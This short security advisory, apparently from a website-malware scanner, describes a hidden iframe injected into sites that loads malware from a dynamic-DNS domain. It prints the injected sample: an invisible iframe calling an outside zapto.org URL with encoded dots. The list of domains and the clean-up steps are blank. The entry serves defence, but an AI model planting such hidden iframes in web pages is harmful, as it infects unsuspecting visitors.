A hidden and suspicious javascript (or iframe) was found on the site. It is loaded from a free dynamic IP address (or domain) and meant to infect visitors of the site. Loads malware from multiple locations:
 (and many other domains).


Clean up:

This malware is generally hidden on .js or .php files without heavy encoding.

Malware dump (sample of malware):

<iframe style="display:none"src="http://qqq-111&#46zapto&#46org/show&#46php"></iframe>